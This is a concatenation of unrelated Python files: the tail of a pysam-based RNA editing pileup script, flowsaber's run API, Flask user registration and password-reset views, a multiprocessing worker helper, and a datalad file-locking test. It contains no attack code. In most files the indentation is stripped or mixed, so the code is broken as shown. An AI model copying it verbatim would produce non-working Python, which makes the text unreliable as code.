seq,qual,strand,blatc,squal='',0,'','',[]
if rmOver: rall=[]
if rmIndel: indels=[]
if rmsh:
if ((pileupcolumn.reference_pos+1)-homo)-1 < 0: sequp=''
else: sequp=(fasta.fetch(chr,((pileupcolumn.reference_pos+1)-homo)-1,(pileupcolumn.reference_pos+1)-1)).upper()
seqdw=(fasta.fetch(chr,pileupcolumn.reference_pos+1,(pileupcolumn.reference_pos+1)+homo)).upper()
			for pileupread in pileupcolumn.pileups: # for each base of the pileup column
#if pileupread.alignment.is_supplementary and not pileupread.is_del: print pileupread.alignment
if pileupread.is_del: continue
if pileupread.alignment.is_qcfail: continue
if pileupread.alignment.is_supplementary: continue
if pileupread.alignment.has_tag('SA'): continue
#print pileupread
#print dir(pileupread)
#print
#print dir(pileupread.alignment)
#print pileupread.alignment.get_tag('NM')
#s,q,t,qq=pileupread.alignment.query_sequence[pileupread.query_position].upper(),pileupread.alignment.query_qualities[pileupread.query_position],'*',pileupread.alignment.qual[pileupread.query_position]
#s,q,t,qq=pileupread.alignment.seq[pileupread.qpos].upper(),ord(pileupread.alignment.qual[pileupread.qpos])-QVAL,'*',pileupread.alignment.qual[pileupread.qpos]
				# exclude intronic positions near splice sites
if exss and di.has_key(pileupcolumn.reference_pos+1): continue
# multiple hit
if exh:
if pileupread.alignment.is_secondary: continue
if pileupread.alignment.has_tag('NH'):
if pileupread.alignment.get_tag('NH') > 1: continue
# duplicates
if exd and pileupread.alignment.is_duplicate: continue
				# if paired-end
				if conc: # if only paired reads must be used
					# skip unpaired reads
					if not pileupread.alignment.is_paired: continue
					# skip non-concordant pairs
					if not pileupread.alignment.is_proper_pair: continue
					# skip concordant pairs mapped in the same orientation
flag=pileupread.alignment.flag
if pileupread.alignment.is_duplicate: flag=flag-1024
if pileupread.alignment.is_secondary: flag=flag-256
if flag in [67,131,115,179]: continue
#print pileupread.alignment.qual
#print pileupread.alignment.flag
#print pileupread.alignment.is_paired
# mapping quality
if mq and pileupread.alignment.mapping_quality < MAPQ: continue
#print pileupread.alignment.query_sequence
if not pileupread.alignment.query_qualities: pileupread.alignment.query_qualities=[30 for vn in range(len(pileupread.alignment.query_sequence))]
#print pileupread.query_position
#s,q,t,qq=pileupread.alignment.query_sequence[pileupread.query_position].upper(),pileupread.alignment.query_qualities[pileupread.query_position],'*',pileupread.alignment.qual[pileupread.query_position]
s,q,t,qq=pileupread.alignment.query_sequence[pileupread.query_position].upper(),pileupread.alignment.query_qualities[pileupread.query_position],'*',pileupread.alignment.query_qualities[pileupread.query_position]
#print s,q,pileupcolumn.reference_pos+1
if rmIndel:
indelALN=pileupread.alignment.get_aligned_pairs(matches_only=False, with_seq=True)
for nn in indelALN:
if nn[0]==pileupread.query_position:
idx_=indelALN.index(nn)
break
indelreg=indelALN[idx_-5:idx_]+[('-','-','-')]+indelALN[idx_+1:idx_+6]
#print pileupread.alignment.query_name, pileupcolumn.reference_pos+1
#print indelreg
indel=countIndels(indelreg)
				# if base quality >= the minimum quality
if q >= MQUAL and pileupcolumn.reference_pos in pileupread.alignment.get_reference_positions():
#tags=dict(pileupread.alignment.tags)
					# infer the strand for each position
					if getstrand:
						# use mapping info if reads are strand-oriented
if pileupread.alignment.is_read1:
if unchange1:
if pileupread.alignment.is_reverse: t='-'
else: t='+'
else:
if pileupread.alignment.is_reverse: t='+'
else: t='-'
elif pileupread.alignment.is_read2:
if unchange2:
if pileupread.alignment.is_reverse: t='-'
else: t='+'
else:
if pileupread.alignment.is_reverse: t='+'
else: t='-'
else: # for single ends
if unchange1:
if pileupread.alignment.is_reverse: t='-'
else: t='+'
else:
if pileupread.alignment.is_reverse: t='+'
else: t='-'
if rmnuc:
						rlen=pileupread.alignment.query_length #pileupread.alignment.qlen # length of this specific read
qp=pileupread.query_position
#print pileupcolumn.reference_pos+1, qp
#print pileupread.alignment
#print pileupread.alignment.query_name,pileupread.alignment.get_aligned_pairs(matches_only=False, with_seq=False)
#print pileupread.alignment, qp , pileupread.alignment.is_reverse,pileupread.alignment.query_sequence[pileupread.query_position].upper()
#print (pileupread.alignment.query_alignment_end-rmp[1]),pileupread.alignment.query_alignment_end-1
#print pileupread.alignment.query_alignment_start, (pileupread.alignment.query_alignment_start+rmp[0])-1
						if rmp[0]>0: # remove positions at the 5' end
if pileupread.alignment.is_reverse:
if (pileupread.alignment.query_alignment_end-rmp[1]) <=qp<= pileupread.alignment.query_alignment_end-1: continue
else:
if pileupread.alignment.query_alignment_start <=qp<= (pileupread.alignment.query_alignment_start+rmp[0])-1: continue
						if rmp[1]>0: # remove positions at the 3' end
if pileupread.alignment.is_reverse:
if pileupread.alignment.query_alignment_start <=qp<= (pileupread.alignment.query_alignment_start+rmp[0])-1: continue
else:
if (pileupread.alignment.query_alignment_end-rmp[1]) <=qp<= pileupread.alignment.query_alignment_end-1: continue
#print qp, rmp
#if pileupread.alignment.is_reverse:
# if qp>(rlen-rmp[0])-1: continue
# if qp<rmp[1]:continue
#else:
# if qp<rmp[0]:continue
# if qp>(rlen-rmp[1])-1: continue
					# if the parent read does not map uniquely according to Blat
if blatr:
rt=0
if pileupread.alignment.is_read1: rt=1
elif pileupread.alignment.is_read2: rt=2
else: rt=0
rname=pileupread.alignment.query_name+'_%i'%(rt)
if d.has_key(rname): blatc+='0' #continue
else: blatc+='1'
					# if the base differs from the reference
					# if in a homopolymeric region, discard
if rmsh and rmHomo(sequp,seqdw,homo,ref): continue
seq+=s
qual+=q
strand+=t
squal.append(qq)
if rmIndel: indels.append(indel)
if rmOver: rall.append((pileupread.alignment.query_name,ref,s))
if greads: # --reads option
if ref!=s:
rt=0
if pileupread.alignment.is_read1: rt=1
elif pileupread.alignment.is_read2: rt=2
else: rt=0
rqname=pileupread.alignment.query_name+'_%i'%(rt)
rname=pileupread.alignment.query_name
rseqname=pileupread.alignment.query_sequence
#print rqname, rseqname, pileupread.alignment.is_unmapped, chr, pileupread.alignment.reference_start,pileupread.alignment.reference_end
#rqname_comp=rqname+'$'+chr+'$'+str(pileupread.alignment.reference_start)+'$'+str(pileupread.alignment.reference_end)
#print pileupread.alignment.query_name,chr,pileupread.alignment.reference_start,pileupread.alignment.reference_end
#print chr,pileupread.alignment.reference_name
if not pileupread.alignment.is_unmapped and rt!=0:
try:
mate=bam.mate(pileupread.alignment)
addpos=(pileupread.alignment.query_name,mate.query_name,pileupread.alignment.reference_name,mate.reference_name,pileupread.alignment.reference_start,pileupread.alignment.reference_end,mate.reference_start , mate.reference_end)
except:
addpos=(pileupread.alignment.query_name,'-',pileupread.alignment.reference_name,'-',pileupread.alignment.reference_start,pileupread.alignment.reference_end,0 , 0)
#print mate.query_name, mate.reference_start , mate.reference_end
else: addpos=(pileupread.alignment.query_name,'-',pileupread.alignment.reference_name,'-',pileupread.alignment.reference_start,pileupread.alignment.reference_end,0 , 0)
rqname_comp=rqname+'$'+pileupread.alignment.reference_name+'$'+str(pileupcolumn.reference_pos+1)
#addpos=(chr+'_'+str(pileupcolumn.reference_pos+1),pileupcolumn.reference_pos+1)
if not grdb.has_key(rqname):
#print rqname reference_start
outreads.write('>'+rqname_comp+'\n'+rseqname+'\n')
#grdb[rqname]=[addpos]
#else:
# if addpos not in grdb[rqname]:
# grdb[rqname].append(addpos)
if addP:
if not grdb2.has_key(rname): grdb2[rname]=addpos
if seq.strip()!='':
#print seq,qual,squal
if rmIndel:
#print 'Indels:',indels
seq,qual,squal,strand,blatc=normByIndels(seq,strand,squal,blatc,indels)
if rmOver:
over_=getOverlap(rall)
seq,qual,squal,strand,blatc=normByOverlap(seq,strand,squal,blatc,over_)
#if over_.count(1)>0:
# print chr,pileupcolumn.reference_pos+1
# print seq
# print 'Over:',over_
# print blatc
if blatr:
if testBlat(blatc): seq,qual,squal,strand=normByBlat(seq,strand,squal,blatc)
else: continue
mystrand='2'
#print seq,strand,strand.count('+'),strand.count('-')
if uann and not getstrand:
if chr in tabix.contigs:
sres=[kk.strand for kk in tabix.fetch(reference=chr,start=(pileupcolumn.reference_pos),end=(pileupcolumn.reference_pos+1),parser=pysam.asGTF())]
mystrand=vstrand(sres)
if getstrand and not uann:
mystr=vstand(strand)
if mystr=='-': mystrand='0'
elif mystr=='+': mystrand='1'
else: mystrand='2'
if mystrand=='0':
seq=comp(seq)
ref=comp(ref)
if mystrand in ['0','1'] and corrstr:
seq,qual,squal=normByStrand(seq,strand,squal,mystrand)
#print qual,squal
cov,bcomp,subs,freq=BaseCount(seq,ref,mmf,vnuc)
if cov < MINCOV: continue
if exms and subs.count(' ')>0: continue
mqua=meanq(qual,len(seq))
#print mqua
if expos:
if chr in extabix.contigs:
exres=[kk for kk in extabix.fetch(reference=chr,start=(pileupcolumn.reference_pos),end=(pileupcolumn.reference_pos+1))]
if len(exres)>0: continue
				# if the substitution is not in usubs
if exinv and subs=='-': continue
if not checkSubs(subs): continue
#print out rna-seq info + dna-seq
				if gdic.has_key(pileupcolumn.reference_pos): # genomic information is available
if exnonh and not gdic[pileupcolumn.reference_pos][1]: continue
if mystrand=='0':
gdic[pileupcolumn.reference_pos][0][2]=comp2(eval(gdic[pileupcolumn.reference_pos][0][2]))
gdic[pileupcolumn.reference_pos][0][3]=comp(gdic[pileupcolumn.reference_pos][0][3])
line='\t'.join([chr,str(pileupcolumn.reference_pos+1),ref,mystrand,str(cov),mqua,str(bcomp),subs,freq]+gdic[pileupcolumn.reference_pos][0])+'\n'
out.write(line)
else:
if exnosupp: continue
line='\t'.join([chr,str(pileupcolumn.reference_pos+1),ref,mystrand,str(cov),mqua,str(bcomp),subs,freq]+['-','-','-','-','-'])+'\n'
out.write(line)
if slist: outrna.write('\t'.join([chr,str(pileupcolumn.reference_pos+1),ref,seq,squal])+'\n')
bam.close()
if not nogbam and isgbam: gbam.close()
fasta.close()
out.close()
if uwf: wtabix.close()
if uann: tabix.close()
if expos: extabix.close()
if slist:
outrna.close()
if not nogbam and isgbam: outdna.close()
if os.path.getsize(outfile)==0: os.remove(outfile)
if greads: outreads.close()
if addP:
for Name in grdb2:
pn=grdb2[Name]
if pn[1]=='-':
pcoo=[pn[4],pn[5]]
pcoo.sort()
outAddP.write('%s\t%i\t%i\n' %(pn[2],pcoo[0]-100,pcoo[-1]+100))
else:
if pn[0]==pn[1] and pn[2]==pn[3]:
pcoo=[xy for xy in pn[4:]]
pcoo.sort()
outAddP.write('%s\t%i\t%i\n' %(pn[2],pcoo[0]-100,pcoo[-1]+100))
#outAddP.write('%s\t%s\n' %(Name,str(grdb2[Name])))
outAddP.close()
sys.stderr.write('Job completed for region: %s:%i-%i\n'%(chr,start_region+1,lenregion))
def do_work1(q): #not in use
while True:
try:
x=q.get(block=False)
if x==None: continue
exploreBAM(x)
except Empty:
break
def do_work(q):
while True:
x=q.get(block=True)
if x==None: break
exploreBAM(x)
####
wRegions=[]
if fworkR:
if NCPU==1: wRegions.append((workR[0],workR[1][0]-1,workR[1][1]))
elif NCPU > 1:
wlen=workR[1][1]-workR[1][0]
wint=wlen/NCPU
wstart=workR[1][0]-1
for i in range(NCPU-1):
wRegions.append((workR[0],wstart,wstart+wint))
wstart=(wstart+wint)
wRegions.append((workR[0],wstart,workR[1][1]))
####
work_queue = Queue()
suffix=[]
kkn=0
if fworkR:
for i in wRegions:
suff='%s_%s_%i' %(i[0],pid,kkn)
suffix.append(suff)
strinput='$'.join([i[0],bamfile,str(i[1]),str(i[2]),suff]) #i+'$'+bamfile
#print strinput
work_queue.put(strinput)
kkn+=1
else:
for i in chrs:
suff='%s_%s_%i' %(i,pid,kkn)
suffix.append(suff)
strinput='$'.join([i,bamfile,'0',str(dicregions[i]),suff]) #i+'$'+bamfile
#print strinput
work_queue.put(strinput)
kkn+=1
"""
processes=[Process(target=do_work, args=(work_queue,)) for i in range(NCPU)]
for t in processes:
t.start()
for t in processes:
t.join()
time.sleep(0.5)
"""
processes=[]
for i in range(NCPU):
work_queue.put(None)
t=Process(target=do_work, args=(work_queue,))
t.start()
processes.append(t)
for t in processes:
t.join()
work_queue.empty()
#
head='Region\tPosition\tReference\tStrand\tCoverage-q%i\tMeanQ\tBaseCount[A,C,G,T]\tAllSubs\tFrequency\tgCoverage-q%i\tgMeanQ\tgBaseCount[A,C,G,T]\tgAllSubs\tgFrequency\n' %(MQUAL,gMQUAL)
sys.stderr.write('Merging Tables.\n')
if gziptab: o=gzip.open(outtable+'.gz','wb')
else: o=open(outtable,'w')
if noheader==0: o.write(head)
if slist:
if gziptab: o2=gzip.open(slistfile+'.gz','wb')
else: o2=open(slistfile,'w')
if len(gbamfile)!=0:
if gziptab: o3=gzip.open(gslistfile+'.gz','wb')
else: o3=open(gslistfile,'w')
if greads:
outReadsFile=os.path.join(outfolder,'outReads_%s' %(pid))
o4=open(outReadsFile,'w')
if addP:
outPosFile=os.path.join(outfolder,'outPosReads_%s' %(pid))
o5=open(outPosFile,'w')
for i in suffix:
if gziptab: tabfile=os.path.join(outfolder,'table_%s.gz' %(i))
else: tabfile=os.path.join(outfolder,'table_%s' %(i))
if os.path.exists(tabfile):
if gziptab: f=gzip.open(tabfile,'rb')
else: f=open(tabfile)
for j in f: o.write(j)
f.close()
os.remove(tabfile)
if slist:
if len(gbamfile)!=0:
if gziptab: dnafile=os.path.join(outfolder,'pileupDNA_%s.gz' %(i))
else: dnafile=os.path.join(outfolder,'pileupDNA_%s' %(i))
if os.path.exists(dnafile):
if gziptab: f=gzip.open(dnafile,'rb')
else: f=open(dnafile)
for j in f: o3.write(j)
f.close()
os.remove(dnafile)
if gziptab: rnafile=os.path.join(outfolder,'pileupRNA_%s.gz' %(i))
else: rnafile=os.path.join(outfolder,'pileupRNA_%s' %(i))
if os.path.exists(rnafile):
if gziptab: f=gzip.open(rnafile,'rb')
else: f=open(rnafile)
for j in f: o2.write(j)
f.close()
os.remove(rnafile)
if greads:
readsfile=os.path.join(outfolder,'readsRNA_%s' %(i))
if os.path.exists(readsfile):
f=open(readsfile)
for j in f: o4.write(j)
f.close()
os.remove(readsfile)
if addP:
addPfile=os.path.join(outfolder,'readsPosRNA_%s' %(i))
if os.path.exists(addPfile):
f=open(addPfile)
for j in f: o5.write(j)
f.close()
os.remove(addPfile)
o.close()
if slist:
o2.close()
if len(gbamfile)!=0: o3.close()
sys.stderr.write('Results saved on %s\n'%(outtable))
if slist:
if len(gbamfile)!=0: sys.stderr.write('Pileup for DNA saved on %s\n'%(gslistfile))
sys.stderr.write('Pileup for RNA saved on %s\n'%(slistfile))
if greads:
o4.close()
sys.stderr.write('RNA reads saved on %s\n'%(outReadsFile))
fastqFiles={'r1':os.path.join(outfolder,'R1_%s.fq' %(pid)),'r2':os.path.join(outfolder,'R2_%s.fq' %(pid))}
for i in range(1,len(fastq)+1):
sys.stderr.write('Getting reads R%i\n'%(i))
cmd='/opt/exp_soft/biomed/epicardi/bin/seqtk subseq %s %s > %s' %(fastq[i-1],outReadsFile,fastqFiles['r'+str(i)])
os.system(cmd)
for i in range(1,len(fastq)+1):
sys.stderr.write('RNA reads in FASTQ saved on %s\n'%(fastqFiles['r'+str(i)]))
if addP: o5.close()
script_time=time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(time.time()))
sys.stderr.write("Script time --> END: %s\n"%(script_time))
|
api.py
|
"""
Expose all variables in core sub-package.
"""
import asyncio

# noinspection PyUnresolvedReferences
import flowsaber
# noinspection PyUnresolvedReferences
from flowsaber.core.channel import *
# noinspection PyUnresolvedReferences
from flowsaber.core.engine.flow_runner import *
# noinspection PyUnresolvedReferences
from flowsaber.core.engine.task_runner import *
# noinspection PyUnresolvedReferences
from flowsaber.core.flow import *
# noinspection PyUnresolvedReferences
from flowsaber.core.operators import *
# noinspection PyUnresolvedReferences
from flowsaber.core.task import *
# noinspection PyUnresolvedReferences
from flowsaber.core.utility.cache import *
# noinspection PyUnresolvedReferences
from flowsaber.core.utility.executor import *
# noinspection PyUnresolvedReferences
from flowsaber.core.utility.state import *
# noinspection PyUnresolvedReferences
from flowsaber.core.utility.target import *
# noinspection PyUnresolvedReferences
from flowsaber.core.utils import *
# noinspection PyUnresolvedReferences
from flowsaber.tasks import *
def run(flow: Flow, server_address: str = None,
agent_id: str = None, context: dict = None,
id: str = None, name: str = None, labels: list = None, **kwargs):
"""
Parameters
----------
flow
server_address
agent_id
context
id
name
labels
kwargs
Returns
-------
"""
from flowsaber.client.client import Client, GraphqlError
assert flow.state == Flow.INITIALIZED, "The flow must be initialized and not being executed yet."
context = context or {}
with flowsaber.context(context) as context:
merged_context = context.to_dict()
loop = asyncio.get_event_loop()
if not agent_id:
flowsaber.context.logger.info("Run the flow in local.")
runner = FlowRunner(flow, server_address=server_address)
if not loop.is_running():
runner.run(context=merged_context)
else:
# this often happens in jupyter notebook where the event loop is already running
flowsaber.context.logger.info("Found a running eventloop, run in another thread, "
"this often happens in jupyter notebook.")
from threading import Thread
flow_thread = Thread(target=runner.run, kwargs={'context': merged_context})
flow_thread.start()
else:
            assert server_address, "Must specify a server address to schedule the flow run on a remote agent."
flowrun_input = FlowRunInput(
id=id or flowsaber.context.random_id,
name=name or flowsaber.context.random_id,
labels=labels or [],
context=merged_context,
state=Scheduled().to_dict(),
flow_id=flow.config_dict['id'],
agent_id=agent_id,
**kwargs
)
async def upload_and_run():
client = Client(server_address)
flowsaber.context.logger.info(f"Upload the flow onto the server: {server_address}")
try:
# test if the flow already exists in server.
await client.query("get_flow", flow.config.id, "id")
except GraphqlError:
await client.mutation("create_flow", flow.serialize(), "id")
await client.query("get_flow", flow.config.id, "id")
flowsaber.context.logger.info(f"Scheduling the flow run in server: {server_address}")
flowrun_data = await client.mutation("update_flowrun", flowrun_input, 'id name labels')
flowsaber.context.logger.info(f"Scheduled the flow run: {flowrun_data} in server: {server_address} ")
await client.close()
return flowrun_data
if not loop.is_running():
return asyncio.run(upload_and_run())
else:
return asyncio.create_task(upload_and_run())
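

# --- Usage sketch (illustrative, not part of the library): @task, @flow and
# --- Channel come from the star imports above; the concrete flow below is a
# --- hypothetical example.
if __name__ == "__main__":
    @task
    def add_one(num: int) -> int:
        return num + 1

    @flow
    def my_flow(num_ch):
        return num_ch | add_one | add_one

    f = my_flow(Channel.values(1, 2, 3))
    run(f)  # no agent_id given, so this executes in the local FlowRunner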
|
views.py
|
# Mostly copied from https://gitlab.com/patkennedy79/flask_recipe_app/blob/master/web/project/users/views.py
#################
#### imports ####
#################
from flask import render_template, Blueprint, request, redirect, url_for, flash, abort
from sqlalchemy.exc import IntegrityError
from flask_login import login_user, current_user, login_required, logout_user
from flask_mail import Message
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from datetime import datetime
from .forms import RegisterForm, LoginForm, EmailForm, PasswordForm
from dynitag import db, mail, app
from dynitag.models import User
################
#### config ####
################
users_blueprint = Blueprint('users', __name__)
##########################
#### helper functions ####
##########################
def flash_errors(form):
for field, errors in form.errors.items():
for error in errors:
flash(u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
), 'info')
def send_async_email(msg):
with app.app_context():
mail.send(msg)
def send_email(subject, recipients, html_body):
msg = Message(subject, recipients=recipients)
msg.html = html_body
thr = Thread(target=send_async_email, args=[msg])
thr.start()
def send_confirmation_email(user_email):
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
confirm_url = url_for(
'users.confirm_email',
token=confirm_serializer.dumps(user_email, salt='email-confirmation-salt'),
_external=True)
html = render_template(
'user/email_confirmation.html',
confirm_url=confirm_url)
print("sending email")
send_email('Confirm Your Email Address', [user_email], html)
def send_password_reset_email(user_email):
password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
password_reset_url = url_for(
'users.reset_with_token',
token = password_reset_serializer.dumps(user_email, salt='password-reset-salt'),
_external=True)
html = render_template(
'user/email_password_reset.html',
password_reset_url=password_reset_url)
send_email('Password Reset Requested', [user_email], html)
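
# --- Token round-trip sketch (illustrative): the confirmation/reset links
# --- built above embed a timed token that the matching route verifies later.
#
#   s = URLSafeTimedSerializer(app.config['SECRET_KEY'])
#   token = s.dumps('user@example.com', salt='email-confirmation-salt')
#   s.loads(token, salt='email-confirmation-salt', max_age=3600)
#   # -> 'user@example.com' (raises if expired or tampered with)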
################
#### routes ####
################
@users_blueprint.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
try:
new_user = User(form.username.data, form.email.data, form.password.data)
new_user.authenticated = True
db.session.add(new_user)
db.session.commit()
login_user(new_user)
send_confirmation_email(new_user.email)
flash('Thanks for registering! Please check your email to confirm your email address.', 'success')
return redirect("/")
except IntegrityError:
db.session.rollback()
flash('Email ({}) already exists.'.format(form.email.data), 'error')
return render_template('user/register.html', form=form)
@users_blueprint.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user is not None and user.is_correct_password(form.password.data):
user.authenticated = True
user.last_logged_in = user.current_logged_in
user.current_logged_in = datetime.now()
db.session.add(user)
db.session.commit()
login_user(user)
return redirect("/projects")
else:
flash('Incorrect login credentials.', 'error')
return render_template('user/login.html', form=form)
@users_blueprint.route('/logout')
@login_required
def logout():
user = current_user
user.authenticated = False
db.session.add(user)
db.session.commit()
logout_user()
return redirect(url_for('index'))
@users_blueprint.route('/confirm/<token>')
def confirm_email(token):
try:
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=3600)
except:
flash('The confirmation link is invalid or has expired.', 'error')
return redirect(url_for('users.login'))
    user = User.query.filter_by(email=email).first()
    if user is None:
        flash('Invalid confirmation link.', 'error')
        return redirect(url_for('users.login'))
    if user.email_confirmed:
flash('Account already confirmed. Please login.', 'info')
else:
user.email_confirmed = True
user.email_confirmed_on = datetime.now()
db.session.add(user)
db.session.commit()
flash('Thank you for confirming your email address!', 'success')
return redirect("/")
@users_blueprint.route('/reset', methods=["GET", "POST"])
def reset():
form = EmailForm()
if form.validate_on_submit():
try:
user = User.query.filter_by(email=form.email.data).first_or_404()
except:
flash('Invalid email address!', 'error')
return render_template('user/password_reset_email.html', form=form)
if user.email_confirmed:
send_password_reset_email(user.email)
flash('Please check your email for a password reset link.', 'success')
else:
flash('Your email address must be confirmed before attempting a password reset.', 'error')
return redirect(url_for('users.login'))
return render_template('user/password_reset_email.html', form=form)
@users_blueprint.route('/reset/<token>', methods=["GET", "POST"])
def reset_with_token(token):
try:
password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = password_reset_serializer.loads(token, salt='password-reset-salt', max_age=3600)
except:
flash('The password reset link is invalid or has expired.', 'error')
return redirect(url_for('users.login'))
form = PasswordForm()
if form.validate_on_submit():
try:
user = User.query.filter_by(email=email).first_or_404()
except:
flash('Invalid email address!', 'error')
return redirect(url_for('users.login'))
user.password = form.password.data
db.session.add(user)
db.session.commit()
flash('Your password has been updated!', 'success')
return redirect(url_for('users.login'))
return render_template('user/reset_password_with_token.html', form=form, token=token)
@users_blueprint.route('/user_profile')
@login_required
def user_profile():
return render_template('user/user_profile.html')
@users_blueprint.route('/email_change', methods=["GET", "POST"])
@login_required
def user_email_change():
form = EmailForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
user_check = User.query.filter_by(email=form.email.data).first()
if user_check is None:
user = current_user
user.email = form.email.data
user.email_confirmed = False
user.email_confirmed_on = None
user.email_confirmation_sent_on = datetime.now()
db.session.add(user)
db.session.commit()
send_confirmation_email(user.email)
flash('Email changed! Please confirm your new email address (link sent to new email).', 'success')
return redirect(url_for('users.user_profile'))
else:
flash('Sorry, that email already exists!', 'error')
except IntegrityError:
flash('Error! That email already exists!', 'error')
return render_template('user/email_change.html', form=form)
@users_blueprint.route('/password_change', methods=["GET", "POST"])
@login_required
def user_password_change():
form = PasswordForm()
if request.method == 'POST':
if form.validate_on_submit():
user = current_user
user.password = form.password.data
db.session.add(user)
db.session.commit()
flash('Password has been updated!', 'success')
return redirect(url_for('users.user_profile'))
return render_template('user/password_change.html', form=form)
@users_blueprint.route('/resend_confirmation')
@login_required
def resend_email_confirmation():
try:
send_confirmation_email(current_user.email)
flash('Email sent to confirm your email address. Please check your email!', 'success')
except IntegrityError:
flash('Error! Unable to send email to confirm your email address.', 'error')
return redirect(url_for('users.user_profile'))
@users_blueprint.route('/admin_view_users')
@login_required
def admin_view_users():
if current_user.role != 'admin':
abort(403)
else:
users = User.query.order_by(User.id).all()
return render_template('user/admin_view_users.html', users=users)
|
gmproc.py
|
import multiprocessing as mp
import time
class Workers:
def __init__(self):
self.targets = {}
self.queue = mp.Queue()
self.results = {}
def add(self, id, target, params=None):
self.targets[id] = ProcessWrapper(id, target, params)
def set_params(self, id, new_value):
self.targets[id].params = new_value
    def run(self, ids=None):
        if ids is None:
            ids = self.targets.keys()
        procs = []
        # start all workers first so they actually run in parallel
        for k in ids:
            p = self.targets[k]
            pr = mp.Process(target=p.run, args=(p.id, self.queue, p.params))
            pr.start()
            procs.append(pr)
        # collect one result per started worker, then reap the processes
        for _ in procs:
            id, value = self.queue.get()
            self.results[id] = value
        for pr in procs:
            pr.join()
        return self.results
class ClientServer:
def __init__(self, server, clients_delay = 0.1):
self.targets = {}
self.queue = mp.Queue()
self.results = {}
self.server = ServerWrapper(server)
        self.clients_delay = clients_delay
def add(self, id, client, params=None):
self.targets[id] = ClientWrapper(id, client, params)
def set_params(self, id, new_value):
self.targets[id].params = new_value
def run(self, ids=None):
if ids is None:
ids = self.targets.keys()
cqueue = {}
for k in ids:
p = self.targets[k]
pr = mp.Process(target=p.run, args=(p.id, p.queue, self.queue, p.params))
cqueue[p.id] = p.queue
p.process = pr
pr.start()
ps = mp.Process(target=self.server.run, args=(cqueue, self.queue))
ps.start()
time.sleep(self.clients_delay)
ps.join()
for k in ids:
c = self.targets[k]
for key in cqueue.keys():
cqueue[key].close()
if c.process is not None:
c.process.join()
c.queue.close()
self.queue.close()
class ProcessWrapper:
def __init__(self, id, target, params=None):
self.id = id
self.target = target
self.params = params
def run(self, id, queue, params):
value = self.target(params)
queue.put( (id, value) )
class ClientWorker:
def __init__(self):
pass
def start(self):
pass
def process(self):
pass
    def update(self, msg):
pass
def wait(self):
pass
def finish(self):
pass
def done(self):
return False
class ServerWorker:
def __init__(self):
pass
def start(self):
pass
def process(self, id, msg):
return None
def wait(self):
pass
def finish(self):
pass
def done(self):
return False
class ServerWrapper:
def __init__(self, target):
self.target = target
def run(self, cqueue, squeue):
self.target.start()
while not self.target.done():
id, msg = squeue.get()
response = self.target.process(id, msg)
if response is not None:
cqueue[id].put(response)
self.target.wait()
self.target.finish()
class ClientWrapper(ProcessWrapper):
def __init__(self, id, target, params=None):
super().__init__(id, target, params)
self.queue = mp.Queue()
self.process = None
def run(self, id, cqueue, squeue, params):
obj = self.target()
obj.start()
while not obj.done():
msg = obj.process()
squeue.put( (id, msg) )
response = cqueue.get()
obj.update(response)
obj.wait()
obj.finish()
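

# --- Minimal usage sketch for Workers (the `_square` target is hypothetical).
# Each worker process calls its target with `params`; the return value is
# collected into a results dict keyed by worker id.
def _square(params):
    return params * params

if __name__ == '__main__':
    workers = Workers()
    workers.add('a', _square, params=3)
    workers.add('b', _square, params=4)
    print(workers.run())  # -> {'a': 9, 'b': 16} (key order may vary)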
|
test_locking.py
|
#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
#ex: set sts=4 ts=4 sw=4 et:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
import os
import os.path as op
import sys
from fasteners import InterProcessLock
from pathlib import Path
from time import time
from ...cmd import (
CommandError,
StdOutErrCapture,
WitlessRunner,
)
from ..locking import (
lock_if_check_fails,
try_lock_informatively,
)
from ...utils import ensure_unicode
from datalad.tests.utils import (
assert_false,
assert_greater,
assert_true,
assert_in,
assert_not_in,
assert_raises,
eq_,
ok_,
ok_exists,
on_osx,
with_tempfile,
)
class Subproc:
# By implementing this closure as a class instead of as a nested function,
# it becomes possible to pickle it.
def __init__(self, tempfile):
self.tempfile = tempfile
def __call__(self, q):
with lock_if_check_fails(False, self.tempfile, blocking=False, _return_acquired=True)\
as (_, lock2, acquired):
# we used to check for .acquired here but it was removed from
# fasteners API: https://github.com/harlowja/fasteners/issues/71
q.put(acquired)
@with_tempfile
def test_lock_if_check_fails(tempfile):
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(True, None) as (check, lock):
assert check is True
assert lock is None
assert check # still available outside
# and with a callable
with lock_if_check_fails(lambda: "valuable", None) as (check, lock):
eq_(check, "valuable")
assert lock is None
eq_(check, "valuable")
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(False, tempfile) as (check, lock):
ok_(lock)
ok_exists(tempfile + '.lck')
assert not op.exists(tempfile + '.lck') # and it gets removed after
# the same with providing operation
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(False, tempfile, operation='get') as (check, lock):
ok_(lock)
ok_exists(tempfile + '.get-lck')
assert not op.exists(tempfile + '.get-lck') # and it gets removed after
from multiprocessing import Queue, Process
q = Queue()
p = Process(target=Subproc(tempfile), args=(q,))
# now we need somehow to actually check the bloody lock functioning
with lock_if_check_fails((op.exists, (tempfile,)), tempfile, _return_acquired=True) as (check, lock, acquired):
eq_(check, False)
ok_(lock)
ok_(acquired)
# but now we will try to lock again, but we need to do it in another
# process
p.start()
assert q.get() is False
p.join()
with open(tempfile, 'w') as f:
pass
    ok_exists(tempfile)
# and we redo -- it will acquire it
p = Process(target=Subproc(tempfile), args=(q,))
p.start()
ok_(q.get())
p.join()
